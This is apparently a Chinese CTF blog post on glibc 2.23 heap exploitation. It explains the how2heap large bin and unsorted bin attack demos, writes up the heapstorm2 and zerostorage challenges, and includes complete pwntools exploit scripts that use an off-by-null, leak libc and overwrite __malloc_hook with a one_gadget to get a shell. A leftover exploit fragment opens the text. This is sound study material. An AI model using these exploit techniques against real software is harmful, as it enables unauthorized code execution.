my_u64 = lambda x: u64(x.ljust(8, '\0'))
my_u32 = lambda x: u32(x.ljust(4, '\0'))
global_max_fast=0x3c67f8
codebase = 0x555555554000
def loginfo(what='',address=0):
    """Log ``what`` followed by ``address`` in hex, wrapped in ANSI bold-cyan escapes."""
    log.info("\033[1;36m" + what + '----->' + hex(address) + "\033[0m")

# todo here
def add(size,content):
    """Drive the 'A' menu command: answer the size prompt, then the content prompt.

    ``content`` is sent with sendline, so a trailing newline is appended.
    """
    p.recvuntil('(CMD)>>> ')
    p.sendline('A')
    p.recvuntil('(SIZE)>>> ')
    p.sendline(str(size))
    p.recvuntil('(CONTENT)>>> ')
    p.sendline(content)
def free(idx):
    """Drive the 'D' menu command for memo ``idx``.

    ``idx`` is 0-based on the script side; the value sent to the program is idx+1.
    """
    p.recvuntil('(CMD)>>> ')
    p.sendline('D')
    p.recvuntil('(INDEX)>>> ')
    p.sendline(str(idx+1))
def edit(idx,content):
    """Drive the 'E' menu command for memo ``idx`` and confirm the change with 'Y'.

    ``idx`` is 0-based on the script side; the value sent to the program is idx+1.
    """
    p.recvuntil('(CMD)>>> ')
    p.sendline('E')
    p.recvuntil('(INDEX)>>> ')
    p.sendline(str(idx+1))
    p.recvuntil('(CONTENT)>>> ')
    p.sendline(content)
    p.recvuntil('(Y/n)>>> ')
    p.sendline('Y')

# Stage 1: leak. Four memos are allocated and two are freed; the program keeps
# printing freed memos, so the list pointers left in the chunks can be read back.
add(0xf0,'a'*0xf0)#0 0x100 chunk
add(0x100,'b'*0x100)#1 0x110 chunk
add(0xf0,'c'*0xf0)#2 0x100 chunk
add(0x100,'d'*0x100)#3 0x110 chunk
free(2)
free(0)
p.recvuntil('CONTENT: ')
# first CONTENT field printed: a heap pointer (0x210 is the offset used to get the heap base)
heap_base=my_u64(p.recv(4))-0x210
loginfo('heapbase',heap_base)
p.recvuntil(' # INDEX: 3')
p.recvuntil('CONTENT: ')
# CONTENT of displayed index 3: a libc pointer; 0x3c4b78 is the same offset the
# other libc 2.23 exploits in this post subtract to obtain the libc base
libc_base=my_u64(p.recv(6))-0x3c4b78
loginfo('libcbase',libc_base)
free(3)
free(1)#clear

# Stage 2: rebuild the layout 0x100 | 0x70 | 0x100 for house of einherjar
#construct again
add(0xf0,p64(heap_base)*2+'\x00'*0xe0)#0 0x100; fd/bk point at the chunk itself for unlink
add(0x68,'\x00'*0x68)#1 0x70
add(0xf0,'\x00'*0xf0)#2 0x100

free(1)
add(0x68,'\x00'*0x60+p64(0x170))#set prev_size + off_by_null
free(2)#Merge all

free(1)#set to fastbin first
# the "(a,b,c,d)" notes below track which memo slots are occupied after each call
#(0,,,)
add(0xe0,'\x00'*0xe0)
#(0,1)
# overwrite the overlapped freed 0x70 chunk: fd = libc_base+0x3c4aed
# (0x23 below the 0x3c4b10 offset that the heapstorm2 script labels __malloc_hook)
add(0xf0,(p64(0)+p64(0x71)+p64(libc_base+0x3c4aed)).ljust(0x70,'\x00')+p64(0)+p64(0x101)+'\x00'*(0xf0-0x80))#fill fakesize0x101 for check by free
#(0,1,2)
add(0x60,'\x00'*0x60)
#(0,1,2,3)
free(0)
#(,1,2,3)
# 0x13 bytes of padding, then the one_gadget at libc offset 0xf02a4 (see notes at the end)
add(0x68,'\x00'*0x13+p64(libc_base+0xf02a4))
#(0,1,2,3)
#gdb.attach(p,'b *0x400c12')
free(3)
# request one more allocation by hand; presumably this malloc call triggers the overwritten hook
p.recvuntil('(CMD)>>> ')
p.sendline('A')
p.recvuntil('(SIZE)>>> ')
p.sendline('1')


p.interactive()
'''libc 2.23 x64
0x45216 execve("/bin/sh", rsp+0x30, environ)constraints: rax == NULL
0x4526a execve("/bin/sh", rsp+0x30, environ)constraints: [rsp+0x30] == NULL
0xf02a4 execve("/bin/sh", rsp+0x50, environ)constraints: [rsp+0x50] == NULL
0xf1147 execve("/bin/sh", rsp+0x70, environ)constraints: [rsp+0x70] == NULL
req = dest - old_top - 4*sizeof(long)
fastbin addree to size: (offset_to_fastbinY/8+2)<<(4 or 3)
largebin chunksize:0x410|0x450|0x490|0x4C0...
'''

how2heap - large_bin_attack&heapstorm2

ubuntu16.04 libc2.23

large_bin_attack.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
/*
This technique is taken from
https://dangokyo.me/2018/04/07/a-revisit-to-large-bin-in-glibc/
[...]
else
{
victim->fd_nextsize = fwd;
victim->bk_nextsize = fwd->bk_nextsize;
fwd->bk_nextsize = victim;
victim->bk_nextsize->fd_nextsize = victim;
}
bck = fwd->bk;
[...]
mark_bin (av, victim_index);
victim->bk = bck;
victim->fd = fwd;
fwd->bk = victim;
bck->fd = victim;
For more details on how large-bins are handled and sorted by ptmalloc,
please check the Background section in the aforementioned link.
[...]
*/

#include<stdio.h>
#include<stdlib.h>

/*
 * how2heap large bin attack demo (glibc without tcache).
 *
 * A freed large chunk that already sits in a large bin has its size, bk and
 * bk_nextsize overwritten. When a second, larger freed chunk is then sorted
 * into the same bin, the insertion code quoted at the top of this file writes
 * that chunk's address through both corrupted pointers, i.e. into stack_var1
 * and stack_var2.
 *
 * The reads and writes through p2/p3 after free() are deliberate: they emulate
 * the vulnerability. The allocation order must not be changed.
 */
int main()
{
    fprintf(stderr, "This technique only works with disabled tcache-option for glibc, see glibc_build.sh for build instructions.\n");
    fprintf(stderr, "This file demonstrates large bin attack by writing a large unsigned long value into stack\n");
    fprintf(stderr, "In practice, large bin attack is generally prepared for further attacks, such as rewriting the "
            "global variable global_max_fast in libc for further fastbin attack\n\n");

    unsigned long stack_var1 = 0;
    unsigned long stack_var2 = 0;

    /* %lu matches unsigned long; %p requires a void * argument. */
    fprintf(stderr, "Let's first look at the targets we want to rewrite on stack:\n");
    fprintf(stderr, "stack_var1 (%p): %lu\n", (void *)&stack_var1, stack_var1);
    fprintf(stderr, "stack_var2 (%p): %lu\n\n", (void *)&stack_var2, stack_var2);

    unsigned long *p1 = malloc(0x320);
    fprintf(stderr, "Now, we allocate the first large chunk on the heap at: %p\n", (void *)(p1 - 2));

    fprintf(stderr, "And allocate another fastbin chunk in order to avoid consolidating the next large chunk with"
            " the first large chunk during the free()\n\n");
    malloc(0x20); /* spacer, intentionally never freed */

    unsigned long *p2 = malloc(0x400);
    fprintf(stderr, "Then, we allocate the second large chunk on the heap at: %p\n", (void *)(p2 - 2));

    fprintf(stderr, "And allocate another fastbin chunk in order to avoid consolidating the next large chunk with"
            " the second large chunk during the free()\n\n");
    malloc(0x20); /* spacer */

    unsigned long *p3 = malloc(0x400);
    fprintf(stderr, "Finally, we allocate the third large chunk on the heap at: %p\n", (void *)(p3 - 2));

    fprintf(stderr, "And allocate another fastbin chunk in order to avoid consolidating the top chunk with"
            " the third large chunk during the free()\n\n");
    malloc(0x20); /* spacer */

    free(p1);
    free(p2);
    /* p2[0] is read after free on purpose: it is the freed chunk's fd field. */
    fprintf(stderr, "We free the first and second large chunks now and they will be inserted in the unsorted bin:"
            " [ %p <--> %p ]\n\n", (void *)(p2 - 2), (void *)(p2[0]));

    malloc(0x90);
    fprintf(stderr, "Now, we allocate a chunk with a size smaller than the freed first large chunk. This will move the"
            " freed second large chunk into the large bin freelist, use parts of the freed first large chunk for allocation"
            ", and reinsert the remaining of the freed first large chunk into the unsorted bin:"
            " [ %p ]\n\n", (void *)((char *)p1 + 0x90));

    free(p3);
    fprintf(stderr, "Now, we free the third large chunk and it will be inserted in the unsorted bin:"
            " [ %p <--> %p ]\n\n", (void *)(p3 - 2), (void *)(p3[0]));

    //------------VULNERABILITY-----------

    fprintf(stderr, "Now emulating a vulnerability that can overwrite the freed second large chunk's \"size\""
            " as well as its \"bk\" and \"bk_nextsize\" pointers\n");
    fprintf(stderr, "Basically, we decrease the size of the freed second large chunk to force malloc to insert the freed third large chunk"
            " at the head of the large bin freelist. To overwrite the stack variables, we set \"bk\" to 16 bytes before stack_var1 and"
            " \"bk_nextsize\" to 32 bytes before stack_var2\n\n");

    p2[-1] = 0x3f1;                             /* size */
    p2[0] = 0;                                  /* fd */
    p2[2] = 0;                                  /* fd_nextsize */
    p2[1] = (unsigned long)(&stack_var1 - 2);   /* bk */
    p2[3] = (unsigned long)(&stack_var2 - 4);   /* bk_nextsize */

    //------------------------------------

    malloc(0x90);

    fprintf(stderr, "Let's malloc again, so the freed third large chunk being inserted into the large bin freelist."
            " During this time, targets should have already been rewritten:\n");

    fprintf(stderr, "stack_var1 (%p): %p\n", (void *)&stack_var1, (void *)stack_var1);
    fprintf(stderr, "stack_var2 (%p): %p\n", (void *)&stack_var2, (void *)stack_var2);

    return 0;
}

感觉这种画个图的话就很明了,我这里画了一个free(p3)之后的图,unsortedbin上有两个chunk,largebin上有一个chunk

这时largebin中的chunk fd_nextsize和bk_nextsize都指向自己,再来看看等下把chunk从unsortedbin中卸下来之后插入largebin的时候是什么样的

largebin在原代码中的插入(largebin对应bin链有chunk的情况)是这样的:

1582823683795

当我们改了原largebin链中的chunk之后,就变成了这样

此时再插入0x410的chunk(对应victim),就会执行最下面那个else分支中的代码,

1
2
3
4
5
6
7
8
else{
victim->fd_nextsize = fwd;//此时的fwd指向0x3f0的chunk
victim->bk_nextsize = fwd->bk_nextsize;//栈指针给到victim的bk_nextsize
fwd->bk_nextsize = victim;
victim->bk_nextsize->fd_nextsize = victim;//此时var2对应的偏移刚好是->bk_nextsize->fd_nextsize
//所以var2会被赋值为victim
}
bck = fwd->bk;//此时bck被设置成了栈指针

接着看,因为后面还会执行一段代码

1
2
3
4
5
mark_bin (av, victim_index);
victim->bk = bck;
victim->fd = fwd;
fwd->bk = victim;
bck->fd = victim;//Here!栈指针指向位置的对应偏移处(var1)就也被赋值成了victim

原理就是这么个原理,任意地址写了两个victim的地址上去

下面直接撸题实操吧

heapstorm2

这个题说实话写的时候overlap之后都不知道该怎么用…所以后来就直接参考了wp(跪…真的是前路漫漫啊)

程序分析

首先根据程序的mmap创建一个新的segment,这样在IDA中看起来会好一些

init

程序用mallopt关掉了所有的fastbin,然后用mmap分配了一块固定地址的内存,并在random_area(0x13370800)为起始的位置存放了0x18个字节的随机数据,其中0偏移处的数据用来异或存放堆指针,+1偏移处的数据用来异或存放申请的size
然后+2和+3偏移处,也就是random_area[1]处的两个数据,是被设置成相等的

设置mask的意思也就是说我们在程序中申请的chunk指针还有对应的size都会被异或两个固定值然后放在这块内存区域

alloc

最多只能有16个chunk,按照顺序排放,其中mask_xor函数就是用来xor对应数据的了,mask1用来xor指针,mask2用来异或size,因为random_area的前四个qword都有意义所以我们看到的数组下标都是+2的(这里可以设置一下结构体再优化一下),calloc(size)之后没有赋值操作,所以只是分配

update

update函数中会往chunk里读入数据(长度不能大于size-0xc),在最后再加上0xc长度的数据HEAPSTORM_II,但是补0的时候发生了溢出,构成off_by_null,这也是程序的漏洞点所在

delete

1582822986854

delete函数就是输入下标然后free,并”清空”记录的数据

view

1582823036813

view函数比较苛刻,需要当我们random_area[1]处的两个值异或为0x13377331的时候才能writen,所以一开始leak不了,这也是我当时卡在这个题一直出不来的主要原因

漏洞分析&exploit

程序只有一个off_by_null,所以就只能shrink freed chunk然后构造overlap了(提醒一下自己以后shrink时一定要记得如果chunk被放回了bin链然后再用fit匹配出来时会触发unlink,如果不设置好fake prev_size,由于前面那个size已经被改了所以unlink检查时就会崩掉,免得老在这坑住)

然后后面的思路就是在random_area的上方利用largebin attack写上一个fakesize构造fake chunk,并在对应bk的地方也写上下图中victim的地址,首先是为了下一步操作时有个可写地址,但其实这个bk还有大用处

largebin attack之后利用overlap将映射区域对应fake chunk的固定地址写在新链入unsortedbin中的chunk的bk上,为了把random_area的内存calloc出来。这个过程可能有点绕,画个图帮自己理解一下(这里unsortedbin上的chunk是largebin attack之后放上去的,为了方便我就干脆画在一起了)

当我们利用largebin attack写上值之后,我们在fakechunk上已经有了size和bk,此时的bk是victim

但是由于PIE的映射是0x5?开头的地址,也就是说我们能接着calloc出来的chunk大小不能超过0x50,可用的地方还得再缩小之后减0xC。而且当mask损坏的时候如果指针都不变,将会没有办法继续进行操作(而且这块区域是被初始化过的,好像不能直接在操作中给mask赋值,不过利用那个字符串去计算一个说不定可以),我当时想尽办法想通过这个0x50的chunk实现exploit但是始终不行,所以就又去参考了师傅们的WP,发现师傅们是通过再构造一个再calloc出来的(跪),瞬间就好像又有思路了

我们写的bk是vicitm,所以calloc这个0x5?的chunk之后victim又被放到unsortedbin上面去了,但是如果这个victim chunk内容是我们通过overlap控制的话,就可以再接着控制其bk然后再calloc一个fake chunk,而且此时fakechunk的构造更简单了因为我们已经有了一个0x5?的chunk,可以直接写一个大一点的fakesize

在接着试图calloc random_area时,我们calloc出vicitm之后,还需要把fake chunk的bk再设置一下,因为unsortedbin卸下时需要可写地址,update那个0x5?的chunk就行(写的这个地址因为是libc的,所以在我这个利用中也发挥了很大的用处)

calloc出来这块mem之后,这里的值就全都被置零了,相当于列表清空..效果大概是这样的:

1582946763810

我这里没有清完,其实还可以清的更空一些,不过也够了。我的size设置的位置偏了8 23333因为当时怕影响到后面的数据

可以看到我们calloc出这块mem的时候,因为是先calloc再通过异或指针存到记录上,所以calloc之后的mask全都成0了,存上去的也就是真实值(0x133703d8 0xf0)

然后通过这个记录填上view需要的固定异或值,并填上我们前面写的libc地址的位置,还有size,直接读出来之后有任意地址写了就完事了!

我选择的是把__malloc_hook写成one_gadget,我看师傅们用的是__free_hook到system然后free一个有/bin/sh字符串的chunk,好像师傅们的更稳定一些,不过到后面任意地址读写之后就简单很多了也不多废话了

这里还记一个看师傅们博客看到的操作,就是largebin attack中如果我们能控制最开始的那个corrupt chunk就能多次利用进行largebin attack

完整EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
# -*- coding: utf-8 -*-
from __future__ import print_function
from pwn import *

binary = './heapstorm2' #binary's name here
context.binary = binary #context here
context.log_level='debug'
pty = process.PTY
p = process(binary, aslr = 1, stdin=pty, stdout=pty) #process option here
'''
Host =
Port =
p = remote(Host,Port)
'''
elf = ELF(binary)
libc = elf.libc

my_u64 = lambda x: u64(x.ljust(8, '\0'))
my_u32 = lambda x: u32(x.ljust(4, '\0'))
global_max_fast=0x3c67f8
codebase = 0x555555554000
def loginfo(what='',address=0):
    """Log ``what`` followed by ``address`` in hex, wrapped in ANSI bold-cyan escapes."""
    log.info("\033[1;36m" + what + '----->' + hex(address) + "\033[0m")

'''libc 2.23 x64
0x45216 execve("/bin/sh", rsp+0x30, environ)constraints: rax == NULL
0x4526a execve("/bin/sh", rsp+0x30, environ)constraints: [rsp+0x30] == NULL
0xf02a4 execve("/bin/sh", rsp+0x50, environ)constraints: [rsp+0x50] == NULL
0xf1147 execve("/bin/sh", rsp+0x70, environ)constraints: [rsp+0x70] == NULL
req = dest - old_top - 4*sizeof(long)
fastbin addree to size: (offset_to_fastbinY/8+2)<<(4 or 3)
largebin chunksize:0x410|0x450|0x490|0x4C0...
'''
# todo here
def alloc(size):
    """Drive menu command '1': answer the 'Size: ' prompt with ``size``."""
    p.recvuntil('Command: ')
    p.sendline('1')
    p.recvuntil('Size: ')
    p.sendline(str(size))
def update(idx,size,content):
    """Drive menu command '2': send the index, the size, then the content.

    ``content`` is sent with sendline, so a trailing newline is appended.
    """
    p.recvuntil('Command: ')
    p.sendline('2')
    p.recvuntil('Index: ')
    p.sendline(str(idx))
    p.recvuntil('Size: ')
    p.sendline(str(size))
    p.recvuntil('Content: ')
    p.sendline(content)
def delete(idx):
    """Drive menu command '3': answer the 'Index: ' prompt with ``idx``."""
    p.recvuntil('Command: ')
    p.sendline('3')
    p.recvuntil('Index: ')
    p.sendline(str(idx))
def view(idx):
    """Drive menu command '4' for ``idx``; the caller reads the program's reply."""
    p.recvuntil('Command: ')
    p.sendline('4')
    p.recvuntil('Index: ')
    p.sendline(str(idx))

# Stage 1: use the off-by-null to shrink a freed chunk, then build overlapping chunks.
# The "(a,b,...)" notes track which indexes are still allocated after each call.
alloc(0x18)#0 for off_by_null
alloc(0xC30)#1 for split
alloc(0x18)#2 for merge
alloc(0x18)#3 guard

payload='\x33'*0xBF0+p64(0xC00)#set fake prev_size
update(1,len(payload),payload)
delete(1)#(0,,2,3)
update(0,0x18-0xc,'a'*(0x18-0xc))#off_by_null 0xC40->0xC00

#split 1 now
alloc(0xf0)#1 0x100 chunk
alloc(0x400)#4 0x410 chunk large
alloc(0x1f0)#5 0x200 chunk
alloc(0x410)#6 0x420 chunk large
#1 remain:0x131

delete(1)#(0,,2,3,4,5,6) for unlink
delete(2)#(0,,,3,4,5,6) merge&overlap

alloc(0xC50)#1 now chunk 1 overlap (4,5,6,remain) & remain to smallbin

# Stage 2: large bin attack through the overlapping chunk 1.
# calloc zeroed the overlapped region, so first rewrite the size fields of the
# 0x410 / 0x200 / 0x420 / 0x130 chunks that live inside chunk 1.
payload='a'*0xf0
payload+=p64(0)+p64(0x411)
payload+='a'*0x400
payload+=p64(0)+p64(0x201)
payload+='a'*0x1f0
payload+=p64(0)+p64(0x421)
payload+='a'*0x410
payload+=p64(0)+p64(0x131)
update(1,len(payload),payload)
# end of size recovery

#alloc(0x410)#2 !!!!!!!need a overlap chunk for victim do not alloc one like me before

delete(4)#(0,1,,3,,5,6) overlapped chunk 4 to ub
alloc(0x430)#2 set chunk 4 to largebin

# overwrite freed chunk 4 (now in the large bin): bk and bk_nextsize
payload='a'*0xf0
payload+=p64(0)+p64(0x411)
payload+=p64(0)+p64(0x133707c3-0x10)#mmap region above the random area
payload+=p64(0)+p64(0x133707d8-0x20)
update(1,len(payload),payload)#set for largebin attack
# end of chunk 4 overwrite

delete(6)#(0,1,2,3,,5) 0x420chunk to ub
alloc(0x440)#4 0x420 chunk to largebin(largebin attack)

# Stage 3: point the 0x200 chunk's bk at the fake chunk in the mmap region.
# Rewrite every header inside chunk 1 again so the 0x200 and 0x130 chunks have
# their prev_inuse bits set.
payload='a'*0xf0
payload+=p64(0)+p64(0x411)
payload+=p64(0)+p64(0x133707c3-0x10)#No other meanings,just ctrl+c ctrl+v
payload+=p64(0)+p64(0x133707d8-0x20)
payload+='a'*0x3e0
payload+=p64(0)+p64(0x201)
payload+='a'*0x1f0
payload+=p64(0)+p64(0x421)
payload+='a'*0x410
payload+=p64(0)+p64(0x131)
update(1,len(payload),payload)
# end of header reset
#gdb.attach(p,'brva 0x113c')
delete(5)#(0,1,2,3,4)#set 0x200 chunk to ub

# overwrite the freed 0x200 chunk's bk with the fake chunk address
fake_chunk=0x133707c0
payload='a'*0xf0
payload+=p64(0)+p64(0x411)
payload+=p64(0)+p64(0x133707c3-0x10)
payload+=p64(0)+p64(0x133707d8-0x20)
payload+='a'*0x3e0
payload+=p64(0)+p64(0x201)
payload+=p64(0)+p64(fake_chunk)
update(1,len(payload),payload)
# end of bk overwrite

alloc(0x1f0)#5 after this we can alloc the first 0x5? chunk
#and we need to pass the chunk_is_mmapped check in _libc_malloc randomly XD
# called with the defaults, so this only logs an empty label and 0x0
loginfo()

# Stage 4: take the 0x5? fake chunk out, plant a second fake chunk, and
# allocate over the random_area.
alloc(0x40)#6 get first mmap region chunk out
update(6,0x18,p64(0x100)+p64(0)+p64(0x133707b0))
#set another fake size&bk,and bk is used for writing libc address:(bck->fd = unsorted_chunks (av))

# reset the 0x420 chunk's bk again:
# we wrote the 0x420 chunk's address (victim) into the bk of the 0x5? chunk,
# so after the 0x5? chunk is allocated the 0x420 chunk is back in the unsorted bin;
# controlling its bk lets the next allocation return the random_area
fake_chunk=0x133707c8
payload='a'*0xf0
payload+=p64(0)+p64(0x411)
payload+='a'*0x400
payload+=p64(0)+p64(0x201)
payload+='a'*0x1f0
payload+=p64(0)+p64(0x421)
payload+=p64(0)+p64(fake_chunk)
payload+='a'*0x400
payload+=p64(0)+p64(0x131)
update(1,len(payload),payload)
# end of bk reset

#We can allocate a 0x100 chunk at the random_area! Play our leak&write game now!!!!!!!!!!!!!!!!!!
alloc(0x410)#7
alloc(0xf0)#8

# Stage 5: chunk 8 overlays the bookkeeping table, so records can be forged directly.
# Write the view key (0x13377331) and make index 0 point at 0x133707c0 with size 8,
# where a libc address was written earlier.
payload=p64(0)*5+p64(0)*2
payload+=p64(0x0)+p64(0x13377331)
payload+=p64(0x133707c0)+p64(8)
update(8,len(payload),payload)
# end of record forgery
view(0)
p.recvuntil('Chunk[0]: ')
libc_base=u64(p.recv(8))-0x3c4b78
loginfo('libc_base',libc_base)


# re-point index 0 at __malloc_hook (libc offset 0x3c4b10); the size is 8+0xc
# because update only accepts input up to size-0xc
payload=p64(0)*5+p64(0)*2
payload+=p64(0x0)+p64(0x13377331)
payload+=p64(0x3c4b10+libc_base)+p64(8+0xc)
update(8,len(payload),payload)
# end of __malloc_hook record

# write the one_gadget at libc offset 0x4526a through index 0, then allocate to trigger it
update(0,8,p64(0x4526a+libc_base))
alloc(0x666)

p.interactive()

how2heap - unsorted_bin&zerostorage

ubuntu16.04 libc2.23

unsorted_bin_into_stack.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>

/*
 * how2heap unsorted_bin_into_stack demo (glibc without tcache).
 *
 * A freed chunk in the unsorted bin has its size and bk overwritten so that the
 * next malloc(0x100) skips it and follows bk to a fake chunk built in
 * stack_buffer, returning &stack_buffer[2].
 *
 * The writes through `victim` after free() are deliberate: they emulate the
 * vulnerability. The allocation order must not be changed.
 */
int main() {
    intptr_t stack_buffer[4] = {0};

    fprintf(stderr, "This technique only works with disabled tcache-option for glibc, see build_glibc.sh for build instructions.\n");

    fprintf(stderr, "Allocating the victim chunk\n");
    intptr_t *victim = malloc(0x100);

    fprintf(stderr, "Allocating another chunk to avoid consolidating the top chunk with the small one during the free()\n");
    intptr_t *p1 = malloc(0x100);
    (void)p1; /* only the allocation matters; the pointer itself is unused */

    /* %p requires a void * argument. */
    fprintf(stderr, "Freeing the chunk %p, it will be inserted in the unsorted bin\n", (void *)victim);
    free(victim);

    /* Newlines added so these two messages no longer run into the next one. */
    fprintf(stderr, "Create a fake chunk on the stack\n");
    fprintf(stderr, "Set size for next allocation and the bk pointer to any writable address\n");
    stack_buffer[1] = 0x100 + 0x10;             /* fake size */
    stack_buffer[3] = (intptr_t)stack_buffer;   /* fake bk */

    //------------VULNERABILITY-----------
    fprintf(stderr, "Now emulating a vulnerability that can overwrite the victim->size and victim->bk pointer\n");
    fprintf(stderr, "Size should be different from the next request size to return fake_chunk and need to pass the check 2*SIZE_SZ (> 16 on x64) && < av->system_mem\n");
    victim[-1] = 32;
    victim[1] = (intptr_t)stack_buffer; // victim->bk is pointing to stack
    //------------------------------------

    fprintf(stderr, "Now next malloc will return the region of our fake chunk: %p\n", (void *)&stack_buffer[2]);
    fprintf(stderr, "malloc(0x100): %p\n", malloc(0x100));
}

意思就是unsortedbin上有一个chunk,然后模拟漏洞更改了其size和bk,这样再malloc相同大小的chunk时这块chunk就不会被malloc,会被放到smallbin里面去,其中libc2.23中unsortedbin卸下的操作是:

1
2
unsorted_chunks (av)->bk = bck;
bck->fd = unsorted_chunks (av);

这里bck就是victim->bk,所以卸下操作基本都是与bk指针相关,与fd无关。这个代码中只需要将栈上对应的size字段和bk设置好即可,0x100chunk被放到smallbin后unsortedbin中情况如图所示

此时可以无限malloc(0x100)都是这个stack chunk,bck始终是他自己

unsorted_bin_attack.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
#include <stdio.h>
#include <stdlib.h>

/*
 * how2heap unsorted bin attack demo.
 *
 * The bk pointer of a freed chunk in the unsorted bin is overwritten with
 * &stack_var - 2. When the chunk is taken out of the bin by the next malloc,
 * the allocator's `bck->fd = unsorted_chunks(av)` store writes a large pointer
 * value into stack_var.
 *
 * The write through `p` after free() is deliberate: it emulates the
 * vulnerability. The allocation order must not be changed.
 */
int main(){
    fprintf(stderr, "This technique only works with buffers not going into tcache, either because the tcache-option for "
            "glibc was disabled, or because the buffers are bigger than 0x408 bytes. See build_glibc.sh for build "
            "instructions.\n");
    fprintf(stderr, "This file demonstrates unsorted bin attack by write a large unsigned long value into stack\n");
    fprintf(stderr, "In practice, unsorted bin attack is generally prepared for further attacks, such as rewriting the "
            "global variable global_max_fast in libc for further fastbin attack\n\n");

    unsigned long stack_var=0;
    fprintf(stderr, "Let's first look at the target we want to rewrite on stack:\n");
    /* %lu matches unsigned long; %p requires a void * argument. */
    fprintf(stderr, "%p: %lu\n\n", (void *)&stack_var, stack_var);

    unsigned long *p=malloc(0x410);
    fprintf(stderr, "Now, we allocate first normal chunk on the heap at: %p\n", (void *)p);
    /* A space was added at the literal boundary; the original printed "withthe". */
    fprintf(stderr, "And allocate another normal chunk in order to avoid consolidating the top chunk with "
            "the first one during the free()\n\n");
    malloc(500); /* spacer, intentionally never freed */

    free(p);
    /* p[1] is read after free on purpose: it is the freed chunk's bk field. */
    fprintf(stderr, "We free the first chunk now and it will be inserted in the unsorted bin with its bk pointer "
            "point to %p\n",(void*)p[1]);

    //------------VULNERABILITY-----------

    p[1]=(unsigned long)(&stack_var-2);
    fprintf(stderr, "Now emulating a vulnerability that can overwrite the victim->bk pointer\n");
    fprintf(stderr, "And we write it with the target address-16 (in 32-bits machine, it should be target address-8):%p\n\n",(void*)p[1]);

    //------------------------------------

    malloc(0x410);
    fprintf(stderr, "Let's malloc again to get the chunk we just free. During this time, the target should have already been "
            "rewritten:\n");
    fprintf(stderr, "%p: %p\n", (void *)&stack_var, (void*)stack_var);
}

这个的原理也是借助于unsortedbin上的卸链表的操作,当unsortedbin上有chunk时,卸链表操作有一个:
bck->fd=unsorted_chunks (av);
在这里,我们首先把chunk的bk改成了栈指针,所以在获取bck的时候bck就会是一个栈地址,然后malloc在unsortedbin上成功匹配到chunk之后,即使没有去接着malloc chunk,对应栈地址+2*sizeof(size_t)的地方也会填上main_arena的地址,这也是这个利用和上面那个利用不一样(不用修改size字段)的原因

这两个都不难我这里就不debug了,直接撸题吧

zerostorage

程序说实话好像逆起来有点复杂,直接看流程更清晰明了

程序分析(流程)

bss段上存了一个记录结构体数组,这个结构体主要是用来管理对应chunk的,分别记录了表示use_or_not的flag、可用长度还有指针(xor了一个随机的mask,导致真正的指针没有存在bss段)

Insert

找记录数组看还有没有剩余的位置,最多记录0x20个

输入的length不能小于0

len>0x1000 calloc(0x1000) read(0x1000)///set ent->len=0x1000
if 0x80<=len<=0x1000 calloc(len) read(len)///set ent->len=len
len<0x80 calloc(0x80) read(len)///set ent->len=len

然后就差不多是读ent->len长度的数据了,这里的比对操作差不多就是为了申请的chunk在0x80~0x1000之间,

update

input(index)

check(index>0x1F,ent->use_or_not)
input(len) check(len>0)
if len>0x1000 a=0x1000 c=0x1000
if 0x80<=len<=0x1000 a=len c=len
if len<0x80 a=0x80 c=len
这个也是为了控制大小在0x80~0x1000之间

if ent->len>=0x80 b=ent->len
else b=0x80

if a!=b realloc(ptr_mask^ent->ptr,a)

readn(ptr,c)
然后更新记录

merge

need ent_num>1
input(fromID) check(fromID>0x1F,mergechunk1.use_or_not)
input(toID) check(toID>0x1F,mergechunk2.use_or_not)
a=0x80,b=0x80
if fromlen+tolen>=0x80 b=fromlen+tolen
if tolen>=0x80 a=tolen

if a==b cpy_len=fromlen
else realloc(to_ptr,b) cpy_len=fromlen
memcpy(chunk_toptr + to_len, from_ptr, cpy_len);
把from的数据拷到新的chunk里对应的位置去

更新一个新的记录
free(from_ptr)
清除掉合并的两个记录

delete

这个就很简单了就是input然后check然后free,并清除掉记录

input(id) check(id>0x1F,use_or_not)
free(ptr) clear record

view

view就是按记录的长度,输出chunk上长度为n的内容

input(id) check(id>0x1F,use_or_not)
write_n

list

输出对应记录的下标和记录下来的长度

漏洞分析

这个题我最开始看了很久主要是因为真的太乱了,特别是前面比来比去的操作,而且我当时没记笔记有点蠢,以后这种比来比去的操作直接记笔记,这样可以知道程序到底是为了干什么

然后漏洞的话基本上第一眼看上去溢出和leak都不行,毕竟什么记录之类的也都在free之后清除了,申请的时候使用的也是calloc,然后再仔细就会发现如果merge中输入的fromID和toID相等的话就会形成UAF,比如先calloc 3个0x90的chunk然后delete第二个,merge(0,0)的话就会把第一个chunk合并成一个0x120的chunk存在记录[1]处,然后free掉这个0x120的chunk,由于是在unsortedbin上所以可以在之前再free一个,设置这个chunk的fd指向那个chunk,再去view的时候就可以leak heap和libc了,而且也可以通过update来更改chunk中的内容

